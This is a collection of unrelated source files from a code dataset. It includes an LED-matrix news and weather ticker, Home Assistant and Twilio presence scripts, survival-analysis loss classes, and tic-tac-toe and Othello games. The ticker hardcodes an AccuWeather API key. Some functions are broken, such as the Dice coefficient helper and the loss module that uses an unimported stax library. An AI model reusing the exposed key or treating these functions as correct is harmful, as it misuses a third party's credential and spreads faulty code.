10\n tempimage.paste(pricecimage, (temp,0))\n temp += pricecimage.size[0] + 10\n tempimage.paste(rasplogo, (temp, 0))\n\n imagelist.append(tempimage)\n # Final image\n image = Image.new(\"RGBA\", (width, 32))\n temp = 0\n for img in imagelist:\n image.paste(img, (temp, 0))\n temp += img.size[0]\n self.width = width\n self.image = image\n\n\n def setWeather(self, force=False):\n logging.debug(\"Set weather\")\n now = time.time()\n duration = 60 * 30 # 30 Minutes\n file = \"weather/weather.json\"\n\n filelastupdate = time.time() - self.weathertime\n logging.debug(\"json: \" + str(filelastupdate ) + \" ?< \" + str (duration) + \" \" + str(filelastupdate > duration))\n if filelastupdate > duration or force: # json file too old?\n try:\n weatherurl = \"http://dataservice.accuweather.com/currentconditions/v1/329319?apikey=h7Z47DvD4mpW0b1iQzuL4sMLVgvc4PI6\"\n urllib.urlretrieve( weatherurl, file) # Try fetch json file\n self.weathertime = os.path.getmtime(file)\n except:\n return\n else:\n logging.debug(\"Using old json file.\")\n return # Won't load the json until the firs expire\n # Get weather information\n try:\n self.default = None # Used to update setDefaultImage\n weatherfile = open(file)\n weatherjson = json.load(weatherfile)[0]\n c_temp = weatherjson[\"Temperature\"][\"Metric\"][\"Value\"]\n f_temp = weatherjson[\"Temperature\"][\"Imperial\"][\"Value\"]\n weathertext = \"{} F ({} C)\".format(f_temp,c_temp)\n weatherimage = self.textToImage(weathertext)\n self.weathertext = weathertext\n self.weather = weatherimage\n except:\n logging.exception(\"ERROR!\")\n logging.debug(\"Error loading json file\")\n self.text = \"Error loading json file.\"\n return\n\n # Weather icon\n #logging.debug(\"Try finding a logo...\")\n url = \"https://developer.accuweather.com/sites/default/files/\"\n iconname = \"{:0>2}-s.png\".format(weatherjson[\"WeatherIcon\"])\n if not os.path.isfile(\"weather/\" + iconname): # Image not available?\n try:\n # Try fetch image file\n logging.debug(\"No weather logo! 
Try to fetch new...\")\n urllib.urlretrieve( url+iconname, \"weather/\" + iconname)\n # Remove white color\n weatherlogo = Image.open(\"weather/\" + str(iconname)).convert(\"RGBA\")\n weatherlogo.thumbnail((60, 60), Imag.AeNTIALIAS)\n background = Image.new(\"RGBA\",(32, 32),color=(255,255,255,0))\n background.paste(weatherlogo,(0,0),weatherlogo)\n weatherlogo.save(\"weather/\" + iconname, \"PNG\")\n #weatherlogo.close()\n except Exception as ex:\n logging.debug(\"Something happened while try to fetch weather file.\")\n logging.exception(\"ERROR!!\")\n return\n weatherlogo = Image.open(\"weather/\" + iconname).convert(\"RGBA\")\n #logging.debug(str(weatherlogo))\n self.weatherlogo = weatherlogo\n\n \n def printNews(self):\n while True:\n self.setNews()\n for news in self.news:\n self.text = str(\"[News] \") + news\n self.setImage(self.text)\n try:\n logging.debug(\"Printing news: \" + self.text)\n except:\n logging.exception\n self.prompt(True, True, True)\n # If there are news while prompt\n if self.stop_prompt.is_set() and self.news_event.is_set():\n logging.debug(\"Exitting news mode\")\n return True\n elif self.stop_prompt.is_set():\n logging.debug(\"Going to other mode.\")\n return True\n elif self.news_event.is_set() is False:\n logging.debug(\"News mode ended.\")\n return True\n logging.debug(\"Reached to the end of news\" )\n\n def printStock(self):\n while True:\n self.setStock()\n self.setStockImage()\n self.text = self.image_text\n try:\n logging.debug(\"Printing stock: \" + self.image_text + \" \" + str(self.width))\n except:\n logging.exception\n self.prompt(True, True, True)\n # If there are stock while prompt\n if self.stop_prompt.is_set() and self.stock_event.is_set():\n logging.debug(\"Exitting stock mode\")\n return True\n elif self.stop_prompt.is_set():\n logging.debug(\"Going to other mode.\")\n return True\n elif self.stock_event.is_set() is False:\n logging.debug(\"Stock mode ended.\")\n return True\n logging.debug(\"Reached to the end of stock\" )\n\n \n def printNyan(self):\n global nyan_list\n width = nyan_list[0].size[0]\n n = -width * 2/3\n temp_width = -width * 2/3\n i = 0\n matrix.Clear()\n while n < 0:\n for file in nyan_list:\n matrix.SetImage(file.im.id, n, 0)\n n += 1\n if n == -width * 1/3 and i < 64:\n n -= 1\n i += 1\n self.stop_prompt.wait(0.045)\n if self.stop_prompt.is_set():\n return\n logging.debug(\"Finish printing Nyan. 
Location: \" + str(n) + \"/\" + str(width))\n\n \n def prompt(self, word=False, second=False, news=False):\n while not self.stop_event.is_set() or self.stop_prompt.is_set():\n if self.stop_prompt.is_set():\n return\n if second is False:\n logging.debug(\"Start first loop!\")\n matrix.Clear()\n while not self.stop_prompt.is_set():\n start = 0 if second else SIZE\n end = -self.width if word else -self.width/2\n if word is True and second is True:\n start = SIZE\n for n in range (start, end, -1):\n # Exit if halted by event\n matrix.SetImage(self.image.im.id, n, 0)\n #logging.debug(\"prompting: \" +str(n) + \"/\" + str(end))\n self.stop_prompt.wait(self.sleep)\n if self.stop_prompt.is_set():\n return\n\n # If news, exit after the first cycle\n if news is True:\n return\n\n # If not news, continue to make repeat\n if second is False:\n if word is True:\n logging.debug(\"Second word loop!\")\n self.prompt(True, True)\n return\n else:\n logging.debug(\"Start second~ loop!\")\n self.prompt(False,True)\n return\n\n\n #def textToImage(self, input, color=\"black\"):\n def textToImage(self, input, color=128):\n text = textwrap.fill(input, 100)\n orig = Image.new(\"RGBA\", (512,32))\n textsize = ImageDraw.Draw(orig).textsize(text, self.font)\n final = Image.new(\"RGBA\", textsize)\n draw = ImageDraw.Draw(final)\n draw.text((0, 0), input, fill = color, font=self.font)\n return final\n \n \n\n############################################################\n# Main Thread\n############################################################\n\nif __name__ == '__main__':\n while True:\n try:\n matrix = Adafruit_RGBmatrix(32, 4)\n SIZE = 32 * 4\n matrix.Clear()\n\n nyan_list = []\n for filename in sorted(glob.glob('nyan/*.png'), key=lambda name: int(name[10:-4])):\n logging.debug(filename)\n im=Image.open(filename)\n im.thumbnail((384, 32), Image.ANTIALIAS)\n nyan_list.append(im)\n\n rasplogo = Image.open(\"rasplogo_s.png\")\n akamailogo = Image.open(\"akamailogo_s.png\")\n\n up = Image.open(\"stock/up.png\")\n down = Image.open(\"stock/down.png\")\n\n thread = MainThread()\n logging.debug(\"Starting main thread.\")\n except:\n logging.exception(\"EXCEPTION\")\n break\n continue\n break\n while True:\n try:\n input = raw_input('>>')\n logging.debug(\"input: \" + str(input))\n if len(input) > 2500:\n pass\n elif input == \"-\" or input == \"+\":\n thread.setSpeed(input)\n elif input == \"1\":\n input = str(\"Cambridge is ready\")\n thread.input(input)\n elif input == \"2\":\n input = str(\"Cambridge has nothing to handover.\")\n thread.input(input)\n elif input == \"3\":\n input = str(\"HAVE A GOOD SHIFT!!\")\n thread.input(input)\n elif input == \"4\" or input == \"news\":\n thread.readNews()\n elif input == \"5\" or input == \"stock\":\n thread.readStock()\n elif input == \"8\" or input == \"nyan\" or input == \"cat\":\n thread.nyan()\n elif input == \"9\" or input == \"silent\":\n thread.silent()\n elif input == \"0\" or input == \"exit\":\n thread.input(\"Exit? 
(y/n)\")\n if raw_input('') is \"y\":\n thread.stop()\n time.sleep(5)\n break\n thread.reset()\n elif input == \"internet\" or input == \"network\" or input == \"net\" or input == \"connection\":\n thread.input(\"Internet on?: \" + str(internetOn()))\n elif input == \"weather\" or input == \"updateweather\":\n thread.setWeather(True)\n elif input == \"counter\" or input == \"count\" or input == \"timer\":\n input = raw_input('number: ')\n try:\n timer = \"...\".join(str(i) for i in reversed(range(int(input)))) + \"!\"\n thread.input(timer)\n except:\n logging.debug(\"Invalid number\")\n elif input == \"\":\n thread.reset()\n else:\n thread.input(input)\n except (KeyboardInterrupt, SystemExit):\n logging.exception(\"EXCEPTION\")\n logging.debug(\"To exit, press 0 or 'exit'\")\n logging.debug(\"Exitting... Goodbye!!\")\n \n\n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":27671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"589626789","text":"#!/usr/bin/env python\n\nfrom struct import pack\nimport cPickle as cp\nfrom numpy import array\n\n# Symmetry preprocessing\nS = cp.load(open(\"S.pkl\",'r'))\nS = array(S)\nnumS = len(S)\n\n# ---\nf = open(\"syms\",'w')\n\n# numbers\nf.write(pack('=i', numS)) # number of symmetries\n\n# Symmetries\nfor i in range(len(S)):\n for j in range(len(S[i])):\n for k in range(len(S[i][j])):\n f.write( pack('=d',float(S[i][j][k])) )\n\n# --- \nf.close()\n","sub_path":"pybvk/graveyard/input-generators/syms/pkl2syms.py","file_name":"pkl2syms.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"204742204","text":"import zope.interface\n\nfrom fb.modules.base import IModule, response\nfrom fb.modules.supermodule import subone, subtwo\n\nclass SuperModule:\n\tzope.interface.implements(IModule)\n\tname=\"Supermodule Test\"\n\tdescription=\"Supermodule Test\"\n\tauthor=\"Michael Pratt (michael.pratt@bazaarvoice.com)\"\n\n\tdef register(self):\n\t\tsubone.module.register(self)\n\t\tsubtwo.module.register(self)\n\nchildren = [subone, subtwo]\nmodule = SuperModule()","sub_path":"fb/modules/supermodule/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"53309341","text":"#!/usr/bin/python\n#-*- coding:utf-8 -*-\n\n#author\t: Jollen Wang\n#date\t: 2016/05/10\n#version: 1.0\n\n'''\n【程序20】\n 题目:一球从100米高度自由落下,每次落地后反跳回原高度的一半;再落下,求它在\n   第10次落地时,共经过多少米?第10次反弹多高?\n'''\n\norignal = 100\nrate = 1.0\nsum = 0\n\ndown = 0\nup = 0\n\nfor i in range(1, 11):\n down = orignal * rate\n sum += (down + up)\n rate /= 2\n up = orignal * rate\n\nprint(\"The 10th down tour: %f, the 10th up hight: %f\" %(sum, up))\n\n\ns = 100.\nh = 50.0\nfor i in range(2, 11):\n s += 2*h\n h /= 2\n\nprint(\"s=%f,h=%f\" %(s, h))\n\n\n\n","sub_path":"python/test/00020.py","file_name":"00020.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"639765708","text":"import torch \nimport numpy as np\n\n# https://github.com/pytorch/pytorch/issues/1249\n\n\ndef dice_coeff(pred, target, cpu=True):\n if cpu:\n pred = pred.cpu().numpy()\n target = target.cpu().numpy()\n\n smooth = 1e-5\n num = pred.size(0)\n m1 = pred.view(num, -1) # Flatten\n m2 = target.view(num, -1) # Flatten\n intersection = (m1 * m2).sum()\n\n 
return (2. * intersection + smooth) / (m1.sum() + m2.sum() + smooth)\n","sub_path":"utils/dicecoeff.py","file_name":"dicecoeff.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"349148146","text":"def encode_direct(x):\n ret = []\n for i in x:\n if ret == []:\n ret.append(i)\n elif isinstance(ret[-1],list) and ret[-1][-1] == i:\n ret[-1][0] += 1\n elif ret[-1] == i:\n ret[-1] = [2,i]\n else:\n ret.append(i)\n return ret \n","sub_path":"P13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"214489252","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom dashboard_client.models import (OrderImpress, OrderItemImpress,\n\tOrderArt, OrderItemArt)\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\nfrom accounts.models import User\n\n\n@login_required\ndef finalize_payment(request, order_id):\n\torder = None\n\t\n\ttry:\n\t\torder = OrderArt.objects.get(id=order_id)\n\texcept:\n\t\torder = OrderImpress.objects.get(id=order_id)\n\n\tif isinstance(order, OrderArt):\n\t\treturn HttpResponse('this part yet not is finished')\n\telif isinstance(order, OrderImpress):\n\t\tcart_items = OrderItemImpress.get_cart_items(order_id)\n\t\tclient = OrderImpress.get_client(order_id)\n\t\t\n\t\tcontext = {\n\t\t\t'order': order,\n\t\t\t'cart_items': cart_items,\n\t\t\t'client': client \n\t\t}\n\t\trequest.session['order_id'] = order_id\n\t\treturn render(request, 'checkout/finalize_payment.html',\n\t\t\tcontext)\n","sub_path":"checkout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"414203018","text":"\"\"\"Tic Tac Toe implementation\"\"\"\nimport copy\nimport math\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\n'''Returns starting state of the board.'''\ndef initial_state():\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\n\n'''Returns player who has the next turn on a board.'''\ndef player(board):\n \n # bring in global X and O player values\n global X, O\n \n # declare values to hold count of X player and O player on board\n xCount = 0\n oCount = 0\n \n for row in board:\n for col in row:\n if col == X:\n xCount += 1\n elif col == O:\n oCount += 1\n\n # check if there is more X moves than O, if there is next player is O otherwise always X first\n if oCount < xCount:\n return O\n\n return X\n\n\n'''Returns set of all possible actions (i, j) available on the board.'''\ndef actions(board):\n # set to hold our actions\n allActions = set()\n \n # loop through all rows in board with rowIndex\n for rowIndex, row in enumerate(board):\n # loop through all collumns in row with index colIndex\n for colIndex, col in enumerate(row):\n # if the space at board[rowIndex][colIndex] is free create and add a tuple containing (rowIndex, colIndex) to allActions\n if col is None:\n #indexTuple = (rowIndex, colIndex)\n allActions.add((rowIndex, colIndex))\n\n return allActions\n\n'''Returns the board that results from making move (i, j) on the board.'''\ndef result(board, action):\n \n global EMPTY\n \n # allocate new memory for a copy of the board\n boardCopy = copy.deepcopy(board)\n \n # get the values from the action tuple\n#rowIndex = 
action[0]\n# colIndex = action[1]\n rowIndex , colIndex = action\n\n if boardCopy[rowIndex][colIndex] is EMPTY:\n boardCopy[rowIndex][colIndex] = player(board)\n\n return boardCopy\n\n\n'''returns True if there are moves left, False if there isnt'''\ndef movesLeft(board):\n \n # bring in global Empty values\n global EMPTY\n\n for row in board:\n for col in row:\n if col is EMPTY:\n return True\n return False\n\n'''Returns the winner of the game, if there is one.'''\ndef winner(board):\n gameWinner = None\n \n # checks for diagonal winner from top left to bottom right and bottom left to top right\n if(board[0][0] == board[1][1] and board[1][1] == board[2][2]) or\\\n (board[0][2] == board[1][1] and board[2][0] == board[1][1]):\n gameWinner = board[1][1]\n return gameWinner\n\n for i in range(3):\n #checks for winner on each row\n if board[i][0] == board[i][1] and board[i][1] == board[i][2]:\n gameWinner = board[i][1]\n break\n \n # checks for winner on each collumn\n elif board[0][i] == board[1][i] and board[1][i] == board[2][i]:\n gameWinner = board[1][i]\n break\n\n return gameWinner\n\n'''Returns True if game is over, False otherwise.'''\ndef terminal(board):\n if winner(board) is None and movesLeft(board):\n return False\n return True\n\n\n'''Returns 1 if X has won the game, -1 if O has won, 0 otherwise.'''\ndef utility(board):\n \n # bring in global X and O player values\n global X, O\n\n if terminal(board):\n gameWinner = winner(board)\n\n if gameWinner == X:\n winnerNumber = 1\n \n elif gameWinner == O:\n winnerNumber = -1\n\n else:\n winnerNumber = 0\n\n return winnerNumber\n \n return None\n\n'''our helper recursive method for minimax function but with a set depth to stop at'''\ndef minimaxRecDepth(board, isMaximizer, depth):\n # if end state return 1 for max win -1 for min win and 0 for tie\n if utility(board) is not None:\n if isMaximizer:\n return utility(board) + depth\n else:\n return utility(board) - depth\n\n if isMaximizer == True:\n score = -math.inf\n for action in actions(board):\n newBoard = result(board, action)\n print(\"Before \" + str(depth))\n minPlayer = minimaxRecDepth(newBoard, not isMaximizer, depth + 1)\n print(\"After \" + str(depth))\n score = max(minPlayer,score)\n\n return score\n\n elif isMaximizer == False:\n score = math.inf\n for action in actions(board):\n newBoard = result(board, action)\n print(\"Before \" + str(depth))\n maxPlayer = minimaxRecDepth(newBoard,not isMaximizer, depth + 1)\n print(\"After: \" + str(depth))\n score = min(maxPlayer, score)\n \n return score\n\n'''our helper recursive method for the minimax function'''\ndef minimaxRec(board, isMaximizer):\n \n # if end state return 1 for max win -1 for min win and 0 for tie\n if utility(board) is not None:\n return utility(board)\n \n if isMaximizer == True:\n score = -math.inf\n for action in actions(board):\n newBoard = result(board, action)\n minPlayer = minimaxRec(newBoard, not isMaximizer)\n score = max(minPlayer,score)\n \n return score\n\n elif isMaximizer == False:\n score = math.inf\n for action in actions(board):\n newBoard = result(board, action)\n maxPlayer = minimaxRec(newBoard,not isMaximizer)\n score = min(maxPlayer, score)\n \n return score\n\n'''Returns the optimal action for the current player on the board.'''\ndef minimax(board):\n \n if terminal(board):\n return None\n\n best_score = None\n maximizer = None\n best_action = None\n\n if player(board) == \"X\":\n maximizer = True\n best_score = -math.inf\n else:\n maximizer = False\n best_score = math.inf\n\n for action in 
actions(board):\n move = result(board,action)\n score = minimaxRec(move, not maximizer)\n #score = minimaxRecDepth(move, not maximizer, 0)\n \n if maximizer:\n if score > best_score:\n best_score = score\n best_action = action\n else:\n if score < best_score:\n best_score = score\n best_action = action\n\n return best_action\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":6288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"400398463","text":"import torch\nimport numpy as np\nfrom scipy.optimize import root_scalar\nfrom scipy.stats import gaussian_kde\n\n# NOTE: the stax.* layer constructors below follow a jax-style API (e.g.\n# jax.experimental.stax) and are assumed to be provided elsewhere; only the\n# math in this module uses torch.\n\n\nclass Loss:\n terminal_layer = None\n N_OUTPUTS = None\n\n def __repr__(self):\n classname = self.__class__.__name__\n s = \"\"\"<%s: N_OUTPUTS=%s>\"\"\" % (\n classname, self.N_OUTPUTS\n )\n return s\n\n def cumulative_hazard(self, params, t):\n # must override this or survival_function\n return -torch.log(self.survival_function(params, t))\n\n def survival_function(self, params, t):\n # must override this or cumulative_hazard\n return torch.exp(-self.cumulative_hazard(params, t))\n\n def hazard(self, params, t):\n return self.cumulative_hazard(params, t)\n\n def log_hazard(self, params, t):\n return torch.log(torch.clamp(self.hazard(params, t), 1e-30))\n\n def inform(self, **kwargs):\n pass\n\n\nclass GeneralizedGamma(Loss):\n\n N_OUTPUTS = 3\n\n def __init__(self, topology):\n self.terminal_layer = [stax.Dense(self.N_OUTPUTS)]\n raise NotImplementedError(\"Jax still needs to have support for incomplete gamma function\")\n\n def cumulative_hazard(self, params, t):\n pass\n\n def log_hazard(self, params, t):\n pass\n\n\n\nclass ParametricMixture(Loss):\n \"\"\"\n\n .. math::\n\n S(t | x) = p_1(x) S_{Weibull}(t | x) + p_2(x) S_{LogLogistic}(t | x) + p_3(x)\n\n\n \"\"\"\n N_OUTPUTS = 3 + 2 + 2\n\n def __init__(self):\n self.terminal_layer = [\n stax.Dense(self.N_OUTPUTS, W_init=stax.randn(1e-10), b_init=stax.randn(1e-10))\n ]\n\n def cumulative_hazard(self, params, t):\n # weights\n ln_p = params[:3] - torch.logsumexp(params[:3], -1)\n ln_p1, ln_p2, ln_p3 = ln_p\n # p1, p2, p3 = torch.clamp(torch.softmax(params[:3]), 1e-25)\n\n # weibull params\n lambda_, rho_ = torch.exp(params[3]), torch.exp(params[4])\n\n # loglogistic params\n # alpha_, beta_ = torch.exp(params[5]), torch.exp(params[6])\n ln_alpha, ln_beta = params[5:7]\n term2 = torch.log(t) - ln_alpha\n\n v = -torch.logsumexp(\n torch.hstack(\n (\n ln_p1 - (t / lambda_) ** rho_,\n ln_p2 - torch.logsumexp(torch.stack((torch.zeros_like(term2), torch.exp(ln_beta) * term2)), 0),\n ln_p3,\n )\n ), 0\n )\n return v\n\n\nclass PiecewiseConstant(Loss):\n def __init__(self, breakpoints):\n self.N_OUTPUTS = len(breakpoints) + 1\n self.breakpoints = torch.hstack((torch.tensor([0.0]), breakpoints, torch.tensor([np.inf])))\n self.terminal_layer = [\n stax.Dense(\n self.N_OUTPUTS, W_init=stax.randn(1e-7), b_init=stax.randn(1e-7)\n ),\n stax.Exp,\n ]\n\n def __repr__(self):\n try:\n classname = self.__class__.__name__\n s = \"\"\"<%s: breakpoints=%s>\"\"\" % (\n classname, self.breakpoints\n )\n except:\n s = \"\"\"<%s>\"\"\" % classname\n return s\n\n def cumulative_hazard(self, params, t):\n M = torch.minimum(self.breakpoints, t)\n M = torch.diff(M)\n return (M * params).sum()\n\n \"\"\"\n def hazard(self, params, t):\n ix = torch.searchsorted(self.breakpoints, t)\n or\n ix = 0\n for tau in self.breakpoints:\n if t < tau:\n break\n ix += 1\n return params[ix]\n \"\"\"\n\n\nclass NonParametric(PiecewiseConstant):\n \"\"\"\n We create the concentration of breakpoints in proportion to the number of 
subjects that died around that time.\n See blog post at https://dataorigami.net/blogs/napkin-folding/non-parametric-survival-function-prediction\n \"\"\"\n\n def __init__(self, n_breakpoints=None):\n self.n_breakpoints = n_breakpoints\n\n def inform(self, **kwargs):\n T = kwargs.pop(\"T\")\n E = kwargs.pop(\"E\")\n\n # first take a look at T, and create a KDE around the deaths\n breakpoints = self.create_breakpoints(T[E.astype(bool)])\n super(NonParametric, self).__init__(breakpoints)\n\n def create_breakpoints(self, observed_event_times):\n def solve_inverse_cdf_problem(f, fprime=None, starting_point=0):\n return root_scalar(f, x0=starting_point, fprime=fprime).root\n\n n_obs = observed_event_times.shape[0]\n dist = gaussian_kde(observed_event_times)\n\n if self.n_breakpoints is None:\n n_breakpoints = min(int(torch.sqrt(n_obs) / 2), torch.unique(observed_event_times).shape[0])\n else:\n n_breakpoints = self.n_breakpoints\n\n breakpoints = torch.empty(n_breakpoints)\n\n # We scale our pdf/cdf by CDF(max observed time) so that we will\n # never have breakpoints greater than the max observed time.\n # call this cdf'\n MAX = observed_event_times.max()\n CDF_M = dist.integrate_box_1d(0, MAX)\n\n sol = 0\n for i, p in enumerate(torch.linspace(0, 1, n_breakpoints + 2)[1:-1]):\n # solve the following simple root problem:\n # cdf'(x) = p\n # cdf(x)/cdf(M) = p\n # cdf(x) = p * cdf(M)\n # cdf(x) - p*cdf(M) = 0\n sol = solve_inverse_cdf_problem(\n f=lambda x: dist.integrate_box_1d(0, x) / CDF_M - p,\n fprime=lambda x: dist(x) / CDF_M,\n starting_point=sol)\n breakpoints[i] = sol\n return breakpoints\n","sub_path":"lifelike/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"563322606","text":"###############################################################################\n# @author : Rohan Kapoor\n# @date : 08/31/2018\n# @name : hasp_reset_all_screens.py\n# @description : Resets to the last viewed screen\n# @params : All params are taken as strings from Home Assistant\n# entities: A list of input numbers that are storing the active pages\n###############################################################################\n\ndef get_nodename(entity_id):\n if not entity_id.startswith('input_number.'):\n return None\n\n prefix = 'input_number.hasp_'\n suffix = '_activepage'\n start = entity_id.find(prefix)\n end = entity_id.find(suffix)\n if start == -1 or end == -1:\n return None\n return entity_id[(start + len(prefix)):end]\n\ndef reset_hasp_screen(hass, entity_id):\n global get_nodename\n nodename = get_nodename(entity_id)\n if not nodename:\n return\n\n cur_state = hass.states.get(entity_id)\n if not cur_state:\n return\n\n hass.services.call('mqtt', 'publish', {\n 'topic': 'hasp/{}/command/page'.format(nodename),\n 'payload': int(float(cur_state.state))\n })\n return\n\nentities = data.get('entities')\n\nif isinstance(entities, str):\n entities = [e.strip() for e in entities.split(',')]\n for entity_id in entities:\n reset_hasp_screen(hass, entity_id)\n","sub_path":"python_scripts/hasp_reset_all_screens.py","file_name":"hasp_reset_all_screens.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438168383","text":"\nimport subprocess\nimport datetime\nfrom twilio.rest import TwilioRestClient \n\n\n# Put your own credentials here \nipRange = \"\"\naddress = \"\" # MAC address of 
device\nACCOUNT_SID = \"AC\" # Twilio SID\nAUTH_TOKEN = \"\" # Twilio Token\nto_=\"\" # Phone Number receiving text\nfrom__=\"\" # Twilio number\n\n\n# Returns if device is connected, false otherwise\n# May take time based on ip range specified\ndef ipcheck():\n # Customize ip range\n result=subprocess.check_output(\"sudo nmap -sn \" + ipRange, shell=True)\n for mac in result.split():\n if len(mac) == len(address):\n if mac == address:\n print(\"True\")\n return True\n return False\n \n\n# Notify user that door has been opened when the device searched is \n# not connected by sending a text to the phone \ndef alert():\n \n client = TwilioRestClient(ACCOUNT_SID, AUTH_TOKEN) \n currentTime = datetime.datetime.now().time()\n currentTime.isoformat()\n client.messages.create(to=to_, from_=from__,\n body=\"Intruder! \" + str(currentTime)[:-10], ) \n \n# Main loop\ndef main():\n while True:\n if not ipcheck():\n continue\n #alert()\n\nmain()\n","sub_path":"alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"226783277","text":"'''\nThis module implements InitalizeOthello and OthelloApplication,\nthe GUI based on tkinter module.\nThe first class provides GUI that user can\ninput data for row, column, first player, and winning condition\nto initialize the othello game.\nThe second class provides the environment that the players can\nset the game board and play it. Also, this class shows the result of the\ngame on the board.\n\n'''\nimport tkinter\nimport othello_model\nimport math\nimport othello\n'''\nInitializeOthello()\nThis class is to make the graphical user interface that\nthe allows the user put the data initializing the game Othello.\nThe user can input row value, column value, the player who will\nhave the choice to place disc first, and the winning condition, which\nis if the user have most disc would be the winner or not.\nThis checks if the data input from user is valid or not to initialize the game.\nWhen the user gets success in initializing data, it makes an OhtelloApplication object\nto show the user the board of the game.\n\n'''\nclass InitializeOthello():\n def __init__ (self):\n '''\n Constructor\n This initializes a label showing the game title,\n a label and an entry to show row and to let the user input\n the row value,\n a label and an entry to show column and to let the user input\n the column value,\n a label and an entry to show first player, allowing the user input\n the first player value,\n a label and an entry to show winning condition and to let the user\n input winning condition,\n and a button to pass above all data to OhtelloApplication class\n to make the class object to proceed the game process.\n '''\n # root\n self._root = tkinter.Tk()\n\n # Label to show the game title - \"OTHELLO GAME\"\n self._oth_label = tkinter.Label(self._root, text = \"OTHELLO GAME\")\n self._oth_label.grid(row = 0)\n\n # Label and Entry for row value\n self._row_lb = tkinter.Label(self._root, text = 'Row:')\n self._row_lb.grid(row = 1)\n self._row_entry = tkinter.Entry(self._root)\n self._row_entry.grid(row=1, column=1)\n\n # Label and Entry for column value\n self._col_lb = tkinter.Label(self._root, text = 'Column:')\n self._col_lb.grid(row = 2)\n self._col_entry = tkinter.Entry(self._root)\n self._col_entry.grid(row = 2, column = 1)\n\n # Label and Entry for first player value\n self._f_player = tkinter.Label(self._root, text = 'First Player: (B/W)')\n 
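# The matching Entry below accepts 'B' or 'W'; that raw string is validated later in _call_board_init.\n 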
self._f_player.grid(row = 3)\n self._f_player_ent = tkinter.Entry(self._root)\n self._f_player_ent.grid(row = 3, column = 1)\n\n # Label and Entry for winning condition value\n self._win_cond_lb = tkinter.Label(self._root, text = \"Winning Condition (< or >)\")\n self._win_cond_lb.grid(row = 4)\n self._win_cond_ent = tkinter.Entry(self._root)\n self._win_cond_ent.grid(row = 4, column = 1)\n\n # Button for the next step\n self._next = tkinter.Button(self._root,text='Next')\n self._next.bind('<Button-1>', self._call_board_init)\n self._next.grid(row = 5)\n\n def run(self):\n '''\n This runs the root window\n '''\n self._root.mainloop()\n\n def _call_board_init(self,event:tkinter.Event):\n '''\n This method validates the input data (row, col, first player,\n and winning condition) by calling _input_valid_check.\n If the data is all valid, it makes an OthelloApplication object\n to go to the next step.\n If any input is invalid, it shows what is wrong and why\n within a message window.\n '''\n try:\n row = int(self._row_entry.get().strip())\n col = int(self._col_entry.get().strip())\n first_p = self._f_player_ent.get().strip()\n win_cond = self._win_cond_ent.get().strip()\n\n self._input_valid_check(row,col,first_p,win_cond)\n ot = OthelloApplication(row, col,first_p, win_cond, self._root)\n self._root.destroy()\n\n except ValueError:\n msg = \"The value of row or col for initialization should be an integer\"\n self._error_msg(msg)\n except othello.RowColInputNotEven:\n msg = \"The value of row and col should be even numbers\"\n self._error_msg(msg)\n except othello.InvalidRowColInput:\n msg = \"The value of row and col should range from \" + str(othello.MIN) + \" to \" + str(othello.MAX)\n self._error_msg(msg)\n except othello.InvalidPlayerChoose:\n msg = \"The player selection must be either B or W\"\n self._error_msg(msg)\n except othello.InvalidWinningCondition:\n msg = \"Invalid input for winning condition\"\n self._error_msg(msg)\n\n def _input_valid_check(self, row, col, first_p, win_cond):\n '''\n This function checks the validity of the inputs (row value,\n column value, first player of the game, and the winning condition)\n used to initialize the game\n '''\n if row % 2 != 0 or col % 2 != 0:\n raise othello.RowColInputNotEven\n\n if row > othello.MAX or col > othello.MAX or \\\n row < othello.MIN or col < othello.MIN:\n raise othello.InvalidRowColInput\n\n if first_p != 'B' and first_p != 'W':\n raise othello.InvalidPlayerChoose\n\n if win_cond != '<' and win_cond != '>':\n raise othello.InvalidWinningCondition\n\n def _error_msg(self, msg):\n '''\n This pops up an error message window showing msg to the user\n '''\n window = tkinter.Tk()\n lb = tkinter.Label(window, text = \"ERROR\\n\"+msg)\n lb.pack(padx = 20)\n\n\n'''\nOthelloApplication\nThis class's window is divided into two frames.\n\nThe upper frame mainly shows the rule of the game, which player has the\ncurrent turn, the score of each disc color, and the button to process the next step.\n\nThe bottom frame shows the game board where users can place discs on their own turn.\n\n'''\nclass OthelloApplication():\n def __init__(self, row_max:int, col_max:int, first_player:str, win_cond: str, root):\n\n self._root_window = tkinter.Tk()\n\n # Data for board size, the first player, the winning condition\n self.row_max = row_max\n self.col_max = col_max\n self.first_player = first_player\n self.curr_player = 'B'\n self.win_cond = win_cond\n\n # If it's True, it 